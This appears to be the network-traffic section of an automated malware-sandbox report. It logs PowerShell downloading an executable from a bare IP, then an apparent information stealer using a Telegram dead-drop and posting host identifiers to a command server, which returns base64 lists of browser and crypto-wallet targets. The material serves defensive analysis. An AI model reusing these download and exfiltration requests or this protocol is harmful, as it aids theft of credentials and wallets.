                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515486956 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515496969 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.515552998 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.525806904 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.525820971 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.525919914 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.526005983 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.526019096 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.526046038 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.526065111 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.526169062 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.526197910 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.571336031 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.639575958 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.642800093 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.642834902 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.642842054 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646260023 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646459103 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646478891 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646491051 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646532059 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646661043 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646692991 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646878004 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646893024 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.646918058 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.653851032 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.653886080 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.654067039 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.654090881 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.654105902 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.654126883 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.654268026 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.654289961 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.656858921 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.656866074 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659511089 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659620047 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659632921 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659759045 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659774065 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659835100 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659845114 CET44349892116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659878016 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659923077 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:47.659949064 CET49892443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.477101088 CET49944443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.477535963 CET49944443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.477543116 CET44349944116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.479042053 CET49944443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.479047060 CET44349944116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.479093075 CET49944443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.479104042 CET44349944116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:08.612190962 CET44349944116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:08.612283945 CET44349944116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:08.612334967 CET49944443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:08.612334967 CET49944443192.168.2.4116.203.12.114
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 17, 2024 17:28:41.915503025 CET | 192.168.2.4 | 1.1.1.1 | 0xe4f4 | Standard query (0) | pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZ | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:29:02.283391953 CET | 192.168.2.4 | 1.1.1.1 | 0xd8c3 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:29:04.523468971 CET | 192.168.2.4 | 1.1.1.1 | 0x8615 | Standard query (0) | sedone.online | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:29:21.201939106 CET | 192.168.2.4 | 1.1.1.1 | 0x6e11 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:29:21.202081919 CET | 192.168.2.4 | 1.1.1.1 | 0xa220 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 17, 2024 17:28:42.154649973 CET | 1.1.1.1 | 192.168.2.4 | 0xe4f4 | Name error (3) | pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZ | none | none | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:29:02.421103001 CET | 1.1.1.1 | 192.168.2.4 | 0xd8c3 | No error (0) | t.me |  | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:29:04.841995955 CET | 1.1.1.1 | 192.168.2.4 | 0x8615 | No error (0) | sedone.online |  | 116.203.12.114 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:29:21.338536024 CET | 1.1.1.1 | 192.168.2.4 | 0x6e11 | No error (0) | www.google.com |  | 142.250.181.100 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:29:21.339005947 CET | 1.1.1.1 | 192.168.2.4 | 0xa220 | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
                                                                                                                                                                                                                                                  • t.me
                                                                                                                                                                                                                                                  • sedone.online
                                                                                                                                                                                                                                                  • www.google.com
                                                                                                                                                                                                                                                  • 138.124.60.133
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49738 | 138.124.60.133 | 80 | 8052 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 17:28:32.455785036 CET | 325 | OUT | GET /lem.exe HTTP/1.1
Accept: */*
Accept-Language: en-ch
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 138.124.60.133
Connection: Keep-Alive
Dec 17, 2024 17:28:33.734358072 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 16:28:33 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 16 Dec 2024 20:29:52 GMT
ETag: "eecb3-629690af4c859"
Accept-Ranges: bytes
Content-Length: 978099
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49756 | 149.154.167.99 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:04 UTC | 86 | OUT | GET /detct0r HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:29:04 UTC | 512 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 17 Dec 2024 16:29:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12324
Connection: close
Set-Cookie: stel_ssid=c455af5d5b9812e89a_11315998753397122053; expires=Wed, 18 Dec 2024 16:29:04 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-17 16:29:04 UTC | 12324 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49764 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:06 UTC | 233 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:29:07 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-17 16:29:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49773 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:08 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----USR1V37900ZM7Q1DTJW4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:29:08 UTC | 256 | OUT | Data Ascii: ------USR1V37900ZM7Q1DTJW4Content-Disposition: form-data; name="hwid"6C9999DF24442409657292-a33c7340-61ca------USR1V37900ZM7Q1DTJW4Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------USR1V37900ZM7Q1DTJW4--
2024-12-17 16:29:09 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-17 16:29:09 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
Data Ascii: 3a1|1|1|1|7610a19a50993d198235bacee5f60466|1|0|1|1|0|50000|00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49779 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:11 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----6XLX4OZU37QQQQ1DJM7Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:29:11 UTC | 331 | OUT | Data Ascii: ------6XLX4OZU37QQQQ1DJM7QContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------6XLX4OZU37QQQQ1DJM7QContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------6XLX4OZU37QQQQ1DJM7QCont
2024-12-17 16:29:11 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-17 16:29:11 UTC | 2192 | IN | Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49785 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:13 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----TR9Z5PZC2VAIMYCT00RI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:29:13 UTC | 331 | OUT | Data Ascii: ------TR9Z5PZC2VAIMYCT00RIContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------TR9Z5PZC2VAIMYCT00RIContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------TR9Z5PZC2VAIMYCT00RICont
2024-12-17 16:29:14 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-17 16:29:14 UTC | 5837 | IN
                                                                                                                                                                                                                                                  Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49791 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:15 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----8YMO8G479H4E37Q1NGD2
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 332
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-17 16:29:15 UTC | 332 | OUT
Data Ascii:
------8YMO8G479H4E37Q1NGD2
Content-Disposition: form-data; name="token"

7610a19a50993d198235bacee5f60466
------8YMO8G479H4E37Q1NGD2
Content-Disposition: form-data; name="build_id"

960009dd8757fc4c7a65dceef295f6e0
------8YMO8G479H4E37Q1NGD2
Cont
2024-12-17 16:29:16 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:16 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
2024-12-17 16:29:16 UTC | 119 | IN
                                                                                                                                                                                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49797 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:18 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----Z58QQQ16FUSJMYM7YUKX
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 6625
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-17 16:29:18 UTC | 6625 | OUT
Data Ascii:
------Z58QQQ16FUSJMYM7YUKX
Content-Disposition: form-data; name="token"

7610a19a50993d198235bacee5f60466
------Z58QQQ16FUSJMYM7YUKX
Content-Disposition: form-data; name="build_id"

960009dd8757fc4c7a65dceef295f6e0
------Z58QQQ16FUSJMYM7YUKX
Cont
2024-12-17 16:29:19 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:18 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
2024-12-17 16:29:19 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49798 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:19 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----4OP8G4WLNYCBIM7Q9HLX
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 489
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-17 16:29:19 UTC | 489 | OUT
Data Ascii:
------4OP8G4WLNYCBIM7Q9HLX
Content-Disposition: form-data; name="token"

7610a19a50993d198235bacee5f60466
------4OP8G4WLNYCBIM7Q9HLX
Content-Disposition: form-data; name="build_id"

960009dd8757fc4c7a65dceef295f6e0
------4OP8G4WLNYCBIM7Q9HLX
Cont
2024-12-17 16:29:20 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:19 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
2024-12-17 16:29:20 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49814 | 142.250.181.100 | 443 | 4092 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:23 UTC | 607 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
2024-12-17 16:29:23 UTC | 1266 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:23 GMT
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-kvqW2_nhT9rgHB4qphr9-Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked


                                                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                  9 | 192.168.2.4 | 49815 | 142.250.181.100 | 443 | 4092 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                  2024-12-17 16:29:23 UTC | 510 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:23 GMT
                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Accept-Ranges: none
